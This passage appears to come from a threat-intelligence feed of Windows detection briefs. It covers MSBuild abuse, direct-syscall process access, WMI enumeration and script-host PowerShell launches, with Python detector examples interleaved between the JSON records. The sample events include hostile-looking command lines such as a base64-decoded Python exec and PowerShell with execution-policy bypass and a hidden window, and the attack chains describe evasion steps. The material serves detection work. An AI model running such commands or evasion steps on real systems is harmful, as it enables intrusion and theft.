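     "command_line": f"python3 -c \"import base64;exec(base64.b64decode('{_PY_B64}'))\""},
    {"executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-Date"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        fin = evaluate(ev)
        if fin:
            print(fin["interpreter"], fin["length"], (fin["decoded"] or "")[-80:])
```

The UTF-16LE-then-UTF-8 order matters: an ASCII payload encoded as UTF-16LE decodes cleanly as UTF-8 too (with embedded NULs), so the ASCII-ratio test is what keeps the PowerShell case from being misread. Treat the threshold as a starting point: pick the value your pipeline's keyword limit actually uses.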
legitimate tool used for building applications. However, adversaries may abuse MSBuild to execute malicious scripts or compile code, effectively bypassing security controls. This technique is often employed to deploy malicious payloads. This detection focuses on identifying instances where MSBuild initiates unusual processes such as PowerShell, Internet Explorer, or the Visual C# Command Line Compiler (csc.exe). This activity is considered suspicious because, outside of build hosts, software development workflows do not typically involve MSBuild directly spawning these processes; csc.exe launched by MSBuild during a genuine build is the main exclusion to tune. The original Elastic detection rule was created on 2020-03-25 and last updated on 2026-05-04.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker modifies or creates an MSBuild project file (.csproj, .proj or .sln) containing malicious commands, typically as an inline task.\u003c/li\u003e\n\u003cli\u003eThe malicious MSBuild project file is crafted to execute a script or compile code.\u003c/li\u003e\n\u003cli\u003eThe attacker runs the malicious project file with msbuild.exe.\u003c/li\u003e\n\u003cli\u003eMSBuild spawns an unusual process such as powershell.exe, csc.exe, or iexplore.exe based on the malicious project file configuration.\u003c/li\u003e\n\u003cli\u003ePowerShell executes arbitrary commands, downloads further payloads, or performs other malicious actions.\u003c/li\u003e\n\u003cli\u003eThe C# compiler (csc.exe) compiles malicious code into an executable or library.\u003c/li\u003e\n\u003cli\u003eThe compiled malware or downloaded payloads execute, leading to further compromise, such as data exfiltration or lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to arbitrary code execution, allowing attackers 
to deploy malware, compromise sensitive data, and establish persistence on the targeted system. The use of MSBuild for malicious purposes allows attackers to bypass application allow-listing and other security controls that trust signed Microsoft binaries. While the precise number of victims is unknown, this technique can be employed against a wide range of organizations, particularly those with vulnerable systems or inadequate endpoint protection.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging, specifically including parent-child relationships, to detect unusual process spawning by MSBuild (logs-endpoint.events.process-*, logs-system.security*, logs-windows.forwarded*, logs-windows.sysmon_operational-*, winlogbeat-*).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Microsoft Build Engine Started an Unusual Process\u0026rdquo; to your SIEM to identify instances of MSBuild spawning suspicious processes, and tune for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of MSBuild spawning PowerShell, csc.exe, or iexplore.exe to determine if the activity is legitimate or malicious (process.name:(\"csc.exe\" or \"iexplore.exe\" or \"powershell.exe\")).\u003c/li\u003e\n\u003cli\u003eMonitor for modifications to MSBuild project files (.csproj, .proj or .sln) for signs of tampering.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T15:30:00Z","date_published":"2024-01-03T15:30:00Z","id":"/briefs/2024-01-msbuild-unusual-process/","summary":"Adversaries may exploit MSBuild to execute malicious scripts or compile code, bypassing security controls; this rule detects unusual processes initiated by MSBuild, such as PowerShell or C# compiler, signaling potential misuse for executing unauthorized or harmful actions.","title":"MSBuild Starts Unusual 
Processes","url":"https://feed.craftedsignal.io/briefs/2024-01-msbuild-unusual-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["EdgeWebView","Acrobat DC","AMP","Symantec Endpoint Protection","Malwarebytes Anti-Exploit"],"_cs_severities":["high"],"_cs_tags":["defense-evasion","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Cisco","Adobe","Symantec","Malwarebytes"],"content_html":"\u003cp\u003eThis detection identifies suspicious process access events on Windows systems where a process attempts to access another process\u0026rsquo;s memory via direct system calls, bypassing standard Windows API calls. Endpoint security solutions often hook userland Windows APIs to detect malicious code execution. Attackers can evade these hooks by directly invoking syscalls, which are lower-level instructions that interact directly with the operating system kernel. The rule specifically looks for process access events (Sysmon Event ID 10) where the call trace does not start in the expected Windows system DLLs (ntdll.dll, the WoW64 layers, win32u.dll), indicating that the caller issued the syscall from its own code to bypass security measures. The rule excludes certain legitimate applications, such as Malwarebytes Anti-Exploit, Cisco AMP, Microsoft EdgeWebView, and Adobe Acrobat DC, to reduce false positives. 
This technique is often employed by advanced malware and red teams to evade detection.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA malicious process is executed on the system, either through user interaction or exploitation of a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe process attempts to gain access to another process\u0026rsquo;s memory space (Target Process).\u003c/li\u003e\n\u003cli\u003eInstead of using standard Windows API calls, the malicious process directly invokes system calls (syscalls) to access the target process\u0026rsquo;s memory.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eCallTrace\u003c/code\u003e in the Sysmon event does not originate from expected system DLLs like \u003ccode\u003entdll.dll\u003c/code\u003e, \u003ccode\u003esysfer.dll\u003c/code\u003e, \u003ccode\u003ewow64cpu.dll\u003c/code\u003e, \u003ccode\u003ewow64win.dll\u003c/code\u003e, or \u003ccode\u003ewin32u.dll\u003c/code\u003e, indicating a direct syscall.\u003c/li\u003e\n\u003cli\u003eThe process might attempt to read sensitive information such as credentials, inject malicious code, or manipulate the target process\u0026rsquo;s behavior.\u003c/li\u003e\n\u003cli\u003eThe malicious process performs actions within the context of the target process, such as executing injected code or accessing sensitive data.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the compromised process to achieve their objectives, such as data exfiltration, lateral movement, or privilege escalation.\u003c/li\u003e\n\u003cli\u003eThe attacker cleans up any traces of their activity and attempts to maintain persistence on the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the compromise of sensitive data, the injection of malicious code into legitimate processes, and the complete takeover of the affected system. 
This can result in data breaches, financial loss, and reputational damage. The impact is especially significant if the target process holds sensitive credentials, browser secrets, or has security-product context.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process access logging (Event ID 10) with call tracing and ingest the logs into your SIEM so the rules in this brief have events to match (\u003ca href=\"https://ela.st/sysmon-event-10-setup\"\u003ehttps://ela.st/sysmon-event-10-setup\u003c/a\u003e). Event ID 10 is not generated without an explicit ProcessAccess rule in the Sysmon configuration, and unscoped ProcessAccess logging is very noisy; scope it to the targets that matter, starting with lsass.exe.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM and tune them for your environment to detect direct syscall process access.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by these rules, focusing on the \u003ccode\u003eSourceImage\u003c/code\u003e, \u003ccode\u003eTargetImage\u003c/code\u003e, \u003ccode\u003eGrantedAccess\u003c/code\u003e, and \u003ccode\u003eCallTrace\u003c/code\u003e fields in the Sysmon event to determine the legitimacy of the process access attempt.\u003c/li\u003e\n\u003cli\u003ePrioritize investigation of alerts where the target process is \u003ccode\u003elsass.exe\u003c/code\u003e or other security-sensitive processes.\u003c/li\u003e\n\u003cli\u003eImplement robust endpoint detection and response (EDR) solutions to detect and prevent malicious activity on endpoints.\u003c/li\u003e\n\u003cli\u003eMonitor for suspicious process creation events originating from the flagged processes.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T15:00:00Z","date_published":"2024-01-03T15:00:00Z","id":"/briefs/2024-01-direct-syscall-process-access/","summary":"Detects suspicious process access events where the call trace does not originate from known Windows system DLLs, indicating potential defense evasion by bypassing hooked APIs via direct syscalls.","title":"Suspicious Process Access via Direct System 
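The CallTrace check this brief describes, worked through as an added Python example (not the feed's rule or Elastic's code): parse the Sysmon Event ID 10 trace into frames, decide whether the deepest frame is one of the DLLs a normal syscall passes through, apply the product exclusions, and rank lsass.exe targets first. The exclusion substrings, the event layout and the three sample events are constructed for the example.

```python
"""Sysmon Event ID 10 CallTrace triage for direct-syscall process access.

Added example for the direct-syscall brief.  A CallTrace is a '|'-separated
list of frames, deepest first, each 'module+offset' or 'UNKNOWN(address)'.
A process-access call made through the normal API leaves ntdll.dll (or the
WoW64 / win32u layers) as the first frame; a hand-rolled syscall stub in
the caller's own image, or in unbacked memory, does not.  The exclusion
substrings, event layout and sample events are constructed.
"""
import ntpath
import re

# First-frame modules the rule treats as a normal syscall path (from the brief).
EXPECTED_FIRST_FRAME = {"ntdll.dll", "win32u.dll", "wow64cpu.dll", "wow64win.dll", "sysfer.dll"}
# Assumption: the brief's product exclusions approximated as install-path substrings.
EXCLUDED_SOURCE_SUBSTRINGS = ("\\malwarebytes anti-exploit\\", "\\cisco\\amp\\",
                              "\\edgewebview\\", "\\adobe\\acrobat dc\\")
SENSITIVE_TARGETS = {"lsass.exe", "csrss.exe", "winlogon.exe"}

_FRAME = re.compile(r"^(?P<module>.+)\+(?P<offset>[0-9A-Fa-f]+)$")


def parse_call_trace(trace):
    """Return [(module_basename_lower, offset_or_None), ...], deepest frame first."""
    frames = []
    for raw in trace.split("|"):
        raw = raw.strip()
        if not raw:
            continue
        if raw.upper().startswith("UNKNOWN"):
            frames.append(("unknown", None))
            continue
        m = _FRAME.match(raw)
        if m:
            frames.append((ntpath.basename(m["module"]).lower(), int(m["offset"], 16)))
        else:
            frames.append((raw.lower(), None))
    return frames


def is_direct_syscall(trace):
    """True when the deepest frame is not one of the expected syscall modules."""
    frames = parse_call_trace(trace)
    return bool(frames) and frames[0][0] not in EXPECTED_FIRST_FRAME


def evaluate(event):
    """Return a finding for a suspicious ProcessAccess event, else None."""
    source = event["SourceImage"].lower()
    if any(s in source for s in EXCLUDED_SOURCE_SUBSTRINGS):
        return None
    if not is_direct_syscall(event["CallTrace"]):
        return None
    target = ntpath.basename(event["TargetImage"]).lower()
    return {
        "source": ntpath.basename(source),
        "target": target,
        "granted_access": event["GrantedAccess"],
        "first_frame": parse_call_trace(event["CallTrace"])[0][0],
        "priority": "high" if target in SENSITIVE_TARGETS else "medium",
    }


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # normal API path: the first frame is the syscall stub inside ntdll.dll
        "SourceImage": "C:\\Windows\\System32\\svchost.exe",
        "TargetImage": "C:\\Windows\\System32\\lsass.exe",
        "GrantedAccess": "0x1000",
        "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d2e4|C:\\Windows\\System32\\KERNELBASE.dll+2c9ae|C:\\Windows\\System32\\svchost.exe+3a1b",
    },
    {   # direct syscall: the stub lives in the caller's own image, not ntdll
        "SourceImage": "C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe",
        "TargetImage": "C:\\Windows\\System32\\lsass.exe",
        "GrantedAccess": "0x1010",
        "CallTrace": "C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe+1c2f|C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe+2b70|UNKNOWN(00007FF6A1B21C2F)",
    },
    {   # same shape, but the source sits under an excluded product path
        "SourceImage": "C:\\Program Files\\Malwarebytes Anti-Exploit\\agent.exe",
        "TargetImage": "C:\\Program Files\\Browser\\browser.exe",
        "GrantedAccess": "0x1410",
        "CallTrace": "C:\\Program Files\\Malwarebytes Anti-Exploit\\agent.exe+4d10|UNKNOWN(00007FFA12345678)",
    },
]


def alerts(events=SAMPLE_EVENTS):
    return [f for f in (evaluate(e) for e in events) if f]
```

Because the decision rests on the deepest frame only, JIT-compiled code, packers and some hooking products also produce a first frame of UNKNOWN or a non-system module; the exclusion list is where such vendor noise is parked, and the priority field keeps lsass.exe accesses at the top of the queue regardless.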
Call","url":"https://feed.craftedsignal.io/briefs/2024-01-direct-syscall-process-access/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel","Sysmon"],"_cs_severities":["medium"],"_cs_tags":["enumeration","wmi","discovery","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne","Crowdstrike"],"content_html":"\u003cp\u003eAttackers can leverage the Windows Management Instrumentation (WMI) to execute commands for reconnaissance and enumeration within a compromised system. This involves spawning native Windows tools via the WMI Provider Service (WMIPrvSE). This activity is often used to gather system and network information in a stealthy manner, which could be part of a larger attack, such as lateral movement or privilege escalation. This behavior matters because it allows adversaries to gather information about the target environment without using easily detectable methods, potentially leading to further compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to a Windows system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker uses WMI to execute a reconnaissance command.\u003c/li\u003e\n\u003cli\u003eWMIPrvSE.exe is invoked to execute the attacker\u0026rsquo;s specified command.\u003c/li\u003e\n\u003cli\u003eThe attacker executes commands such as \u003ccode\u003eipconfig.exe\u003c/code\u003e, \u003ccode\u003enet.exe\u003c/code\u003e, or \u003ccode\u003esysteminfo.exe\u003c/code\u003e via WMIPrvSE.exe to gather network configuration details, user information, and system information.\u003c/li\u003e\n\u003cli\u003eThe enumerated information is collected and potentially exfiltrated to a command and control server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the gathered information to identify 
further targets within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker moves laterally to other systems using stolen credentials or exploited vulnerabilities.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as data exfiltration, ransomware deployment, or persistent access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful execution of enumeration commands via WMIPrvSE allows attackers to gather sensitive information about the system and network environment. This information can be used to facilitate lateral movement, privilege escalation, and data theft, potentially leading to significant financial loss, reputational damage, and disruption of business operations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation logging to capture the execution of enumeration commands (Data Source: Sysmon).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Enumeration Command Spawned via WMIPrvSE\u0026rdquo; to your SIEM to detect suspicious WMIPrvSE activity (Sigma rule).\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of WMIPrvSE spawning common enumeration tools such as \u003ccode\u003enet.exe\u003c/code\u003e, \u003ccode\u003eipconfig.exe\u003c/code\u003e, or \u003ccode\u003esysteminfo.exe\u003c/code\u003e (Sigma rule).\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the scope of potential lateral movement following successful enumeration (Attack Chain).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T15:00:00Z","date_published":"2024-01-03T15:00:00Z","id":"/briefs/2024-01-wmiprvse-enumeration/","summary":"This rule detects suspicious execution of system enumeration commands by the Windows Management Instrumentation Provider Service (WMIPrvSE), indicating potential reconnaissance or malicious activity on Windows 
systems.","title":"Suspicious Enumeration Commands Spawned via WMIPrvSE","url":"https://feed.craftedsignal.io/briefs/2024-01-wmiprvse-enumeration/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["high"],"_cs_tags":["execution","script-execution","malware"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers may attempt to execute malicious scripts from suspicious directories or from folders reachable through environment variables. This technique leverages script interpreters such as \u003ccode\u003ecscript.exe\u003c/code\u003e, \u003ccode\u003ewscript.exe\u003c/code\u003e, \u003ccode\u003emshta.exe\u003c/code\u003e, and \u003ccode\u003epowershell.exe\u003c/code\u003e to run scripts from locations like the Temp directory, the Public user folder, or other user profile directories. The use of these locations can help attackers evade detection, as security tools may not thoroughly inspect files executed from these typically benign locations. This activity has been associated with threat actors such as Shuckworm, known to target the Ukrainian military.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access, potentially through phishing or exploiting a software vulnerability.\u003c/li\u003e\n\u003cli\u003eA malicious script is dropped into a suspicious folder such as \u003ccode\u003eC:\\Users\\Public\\\u003c/code\u003e, \u003ccode\u003e%TEMP%\u003c/code\u003e, or \u003ccode\u003eC:\\Users\\\u0026lt;username\u0026gt;\\AppData\\Local\\Temp\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ecscript.exe\u003c/code\u003e, \u003ccode\u003ewscript.exe\u003c/code\u003e, or \u003ccode\u003emshta.exe\u003c/code\u003e to execute the dropped script. 
These interpreters run the script as given; they have no execution policy to bypass.\u003c/li\u003e\n\u003cli\u003eAlternatively, PowerShell is invoked with \u003ccode\u003e-ep bypass\u003c/code\u003e or \u003ccode\u003e-ExecutionPolicy Bypass\u003c/code\u003e (the execution policy applies only to PowerShell), often together with \u003ccode\u003e-w hidden\u003c/code\u003e to hide the window, along with a command to execute the script located in the temporary folder.\u003c/li\u003e\n\u003cli\u003eThe script executes, performing malicious actions such as downloading additional payloads, establishing persistence, or exfiltrating data.\u003c/li\u003e\n\u003cli\u003eThe script may leverage built-in Windows utilities for further malicious activities.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as data theft or system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to a range of damaging outcomes, including system compromise, data theft, and further propagation of malware within the network. Organizations may experience data breaches, financial losses, and reputational damage. 
The compromise of systems can also disrupt business operations and require extensive recovery efforts.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eScript Interpreter Execution From Suspicious Folder\u003c/code\u003e to your SIEM to detect suspicious script executions.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events with a focus on script interpreters (\u003ccode\u003ecscript.exe\u003c/code\u003e, \u003ccode\u003ewscript.exe\u003c/code\u003e, \u003ccode\u003emshta.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e) executing from suspicious directories, using the \u003ccode\u003elogsource\u003c/code\u003e and \u003ccode\u003edetection\u003c/code\u003e sections of the Sigma rule as a guide.\u003c/li\u003e\n\u003cli\u003eTune the filters in the Sigma rule based on your environment to reduce false positives, as described in the \u003ccode\u003efalsepositives\u003c/code\u003e section.\u003c/li\u003e\n\u003cli\u003eReview and block any observed malicious command lines containing flags like \u003ccode\u003e-ep bypass\u003c/code\u003e, \u003ccode\u003e-ExecutionPolicy bypass\u003c/code\u003e, or \u003ccode\u003e-w hidden\u003c/code\u003e, as detailed in the \u003ccode\u003eselection_proc_flags\u003c/code\u003e section of the Sigma rule.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:30:00Z","date_published":"2024-01-03T14:30:00Z","id":"/briefs/2024-01-suspicious-script-execution/","summary":"Malware may execute scripts from suspicious directories accessible via environment variables using script interpreters like cscript, wscript, mshta, and powershell to evade detection.","title":"Suspicious Script Interpreter Execution from Environment Variable Folders","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-script-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft 
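The folder and flag checks this brief describes, as an added Python example that is not the feed's Sigma rule: the interpreter name is matched, the user-writable folders are looked for both literally and as environment-variable references, and PowerShell's abbreviated switches are normalised so that -ep bypass and -ExecutionPolicy Bypass count as the same finding. The alias table is taken from powershell.exe's own usage text; the folder regex, the event layout and the sample events are constructed.

```python
"""Script interpreters launched against files in user-writable or env-var folders.

Added example for the script-interpreter brief.  Checks the interpreter
name, looks for the folders the brief names (literal or via %TEMP%,
%PUBLIC%, %APPDATA%, ...) anywhere on the command line, and normalises
PowerShell's abbreviated switches.  Folder regex, event layout and the
sample events are constructed for the example.
"""
import ntpath
import re

INTERPRETERS = {"cscript.exe", "wscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe"}

SUSPICIOUS_FOLDER = re.compile(
    r"(?i)%(?:temp|tmp|public|appdata|localappdata|programdata)%"
    r"|\\users\\public\\|\\appdata\\local\\temp\\|\\windows\\temp\\|\\programdata\\")

# Switch aliases listed by 'powershell.exe /?'.  PowerShell also accepts any
# unambiguous prefix of a parameter name; the >=3-character rule below
# approximates that (assumption, good enough for '-exec', '-win', '-enco').
PS_PARAMS = {
    "executionpolicy": {"ep", "ex"},
    "windowstyle": {"w"},
    "encodedcommand": {"e", "ec", "enc"},
    "noprofile": {"nop"},
}
FLAG_VALUES = {"executionpolicy": {"bypass", "unrestricted"}, "windowstyle": {"hidden"}}


def canonical_param(token):
    """Map '-ep', '-exec', '/ExecutionPolicy' ... to 'executionpolicy' (or None)."""
    if token[:1] not in ("-", "/"):
        return None
    t = token[1:].lower()
    for full, aliases in PS_PARAMS.items():
        if t == full or t in aliases or (len(t) >= 3 and full.startswith(t)):
            return full
    return None


def powershell_flags(args):
    """Return findings such as ['executionpolicy=bypass', 'windowstyle=hidden']."""
    found = []
    for i, tok in enumerate(args):
        param = canonical_param(tok)
        if param in FLAG_VALUES and i + 1 < len(args):
            value = args[i + 1].lower()
            if value in FLAG_VALUES[param]:
                found.append(f"{param}={value}")
    return found


def evaluate(event):
    """Return a finding when an interpreter touches a suspicious folder, else None."""
    name = ntpath.basename(event["executable"]).lower()
    if name not in INTERPRETERS:
        return None
    args = event["args"]
    folder = SUSPICIOUS_FOLDER.search(" ".join(args))
    if not folder:
        return None
    flags = powershell_flags(args) if name in ("powershell.exe", "pwsh.exe") else []
    return {"interpreter": name, "folder": folder.group(0).lower(), "flags": flags}


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"executable": "C:\\Windows\\System32\\wscript.exe",
     "args": ["wscript.exe", "C:\\Users\\Public\\invoice.vbs"]},
    {"executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "args": ["powershell.exe", "-nop", "-ep", "bypass", "-w", "hidden", "-File", "%TEMP%\\a.ps1"]},
    {"executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "args": ["powershell.exe", "-ExecutionPolicy", "Bypass", "-File", "C:\\Program Files\\Vendor\\deploy.ps1"]},
    {"executable": "C:\\Windows\\System32\\cscript.exe",
     "args": ["cscript.exe", "//nologo", "C:\\Windows\\System32\\slmgr.vbs", "/dli"]},
    {"executable": "C:\\Windows\\System32\\mshta.exe",
     "args": ["mshta.exe", "C:\\Users\\bob\\AppData\\Local\\Temp\\update.hta"]},
]
```

The third sample (bypass flag, but a script under Program Files) is deliberately not a finding: the rule keys on the folder, and the flags only enrich the alert. If your environment's deployment tooling stages scripts in ProgramData, that is the alternative to drop from the regex rather than the flag check.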
Defender XDR","Elastic Defend","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["initial-access","execution","windows","powershell","script"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eThis detection identifies PowerShell execution initiated by Windows Script Host processes (cscript.exe or wscript.exe). Attackers often use Windows Script Host (WSH) to execute malicious scripts as an initial access method. These scripts can act as droppers for second-stage payloads or download tools and utilities necessary for further compromise. The rule focuses on the parent-child process relationship between WSH and PowerShell, highlighting a common technique used to bypass security controls and execute arbitrary commands on a compromised system. This activity is relevant to defenders as it represents a potential entry point for various attacks, including malware deployment and data exfiltration. The detection logic is based on process execution events observed in Windows environments and is designed to work with data from Elastic Defend, Microsoft Defender XDR, SentinelOne Cloud Funnel, and Sysmon.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe user receives a phishing email with a malicious attachment (e.g., a .vbs or .js file).\u003c/li\u003e\n\u003cli\u003eThe user opens the attachment, which is processed by either wscript.exe or cscript.exe.\u003c/li\u003e\n\u003cli\u003eThe scripting engine executes the embedded malicious code.\u003c/li\u003e\n\u003cli\u003eThe script downloads a PowerShell script from a remote server or contains an embedded, obfuscated PowerShell command.\u003c/li\u003e\n\u003cli\u003eThe script, running inside wscript.exe or cscript.exe, launches powershell.exe to execute the downloaded or embedded PowerShell script, which makes the script host the parent process of PowerShell.\u003c/li\u003e\n\u003cli\u003ePowerShell executes, performing malicious actions such as downloading 
additional payloads, modifying system settings, or establishing persistence.\u003c/li\u003e\n\u003cli\u003ePowerShell attempts to connect to external command-and-control servers to receive further instructions.\u003c/li\u003e\n\u003cli\u003eThe attacker gains initial access to the system and can proceed with lateral movement, data exfiltration, or other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to initial access, allowing attackers to deploy malware, steal sensitive information, or perform other malicious activities. The impact can range from data breaches and financial losses to reputational damage. The severity depends on the attacker\u0026rsquo;s objectives and the level of access they gain. The number of affected systems depends on the scope of the phishing campaign or other initial access methods used to deliver the malicious script.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation logging to capture the necessary event data for the rules below.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate process execution chains where cscript.exe or wscript.exe spawn powershell.exe using the provided Sigma rules.\u003c/li\u003e\n\u003cli\u003eImplement email security measures to block phishing emails with script attachments.\u003c/li\u003e\n\u003cli\u003eMonitor network connections originating from PowerShell processes for suspicious outbound traffic.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:30:00Z","date_published":"2024-01-03T14:30:00Z","id":"/briefs/2024-01-script-powershell-execution/","summary":"Detection of PowerShell processes launched by cscript.exe or wscript.exe, indicative of potential malicious initial access or execution 
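Four briefs on this page (Suspicious Execution via Scheduled Task, Microsoft Build Engine Started an Unusual Process, Enumeration Command Spawned via WMIPrvSE, and Suspicious PowerShell Execution via Windows Script Host) are all parent/child lineage rules, so one added Python example serves them together. It is not code from the feed or from Elastic: the rule names mirror the briefs, but the rule table, the field names and the sample events are constructed, and the Scheduled Task rule is generalised to treat either the child image or any argument under a user-writable root as satisfying the path condition.

```python
"""Parent/child process-lineage detection, added here as a worked example.

One rule table covers the four lineage rules in this feed: Scheduled Task
(svchost.exe "Schedule" -> shell/script host with a user-writable path),
MSBuild -> unusual child, WMIPrvSE -> enumeration tool, and Windows Script
Host -> PowerShell.  Rule names mirror the briefs, but the field names, the
table and the sample events are constructed; they are not the feed's Sigma
or Elastic rules.
"""
import ntpath

# User-writable roots the Scheduled Task brief names.  Assumption: the rule
# is satisfied when either the child image or any argument lives under one.
SUSPICIOUS_DIRS = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

RULES = [
    # (rule name, parent names, required parent argument, child names, needs user-writable path)
    ("Suspicious Execution via Scheduled Task", {"svchost.exe"}, "schedule",
     {"powershell.exe", "cmd.exe", "mshta.exe", "cscript.exe"}, True),
    ("Microsoft Build Engine Started an Unusual Process", {"msbuild.exe"}, None,
     {"powershell.exe", "csc.exe", "iexplore.exe"}, False),
    ("Enumeration Command Spawned via WMIPrvSE", {"wmiprvse.exe"}, None,
     {"net.exe", "net1.exe", "ipconfig.exe", "systeminfo.exe"}, False),
    ("Suspicious PowerShell Execution via Windows Script Host", {"wscript.exe", "cscript.exe"}, None,
     {"powershell.exe", "pwsh.exe"}, False),
]


def in_suspicious_dir(path):
    """True when a (possibly quoted) Windows path sits under a user-writable root."""
    return path.strip('"').lower().startswith(SUSPICIOUS_DIRS)


def evaluate(event, rules=RULES):
    """Return the names of every rule one process-creation event matches.

    event keys: parent_executable, parent_args, executable, args
    (Windows paths and argv-style lists).
    """
    parent = ntpath.basename(event["parent_executable"]).lower()
    child = ntpath.basename(event["executable"]).lower()
    parent_args = [a.lower() for a in event["parent_args"]]
    hits = []
    for name, parents, parent_arg, children, needs_path in rules:
        if parent not in parents or child not in children:
            continue
        if parent_arg and parent_arg not in parent_args:
            continue
        if needs_path and not any(in_suspicious_dir(p) for p in [event["executable"], *event["args"]]):
            continue
        hits.append(name)
    return hits


def _ev(parent_exe, parent_args, exe, args):
    return {"parent_executable": parent_exe, "parent_args": parent_args,
            "executable": exe, "args": args}


_SVCHOST = "C:\\Windows\\System32\\svchost.exe"
_SCHED_ARGS = ["svchost.exe", "-k", "netsvcs", "-p", "-s", "Schedule"]
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # 0: Task Scheduler -> powershell with a script under C:\Users\Public
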